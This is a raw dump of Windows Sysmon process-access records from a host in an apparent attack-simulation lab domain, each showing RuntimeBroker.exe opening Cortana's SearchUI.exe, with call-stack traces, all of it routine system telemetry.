13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166068C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011847Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165876C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.onecore.dll+16e7e|C:\Windows\system32\windows.cortana.onecore.dll+15cb7|C:\Windows\system32\windows.cortana.onecore.dll+15e27|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86 10341000x800000000000000011846Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166068C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011845Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166120C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011844Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166120C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011843Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011842Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011841Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166052C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011840Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166052C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011839Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166028C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011838Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011837Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166124C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011836Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166028C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011835Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166124C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011834Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011833Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166028C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011832Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166028C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011831Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011830Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166052C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011829Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166052C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011828Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 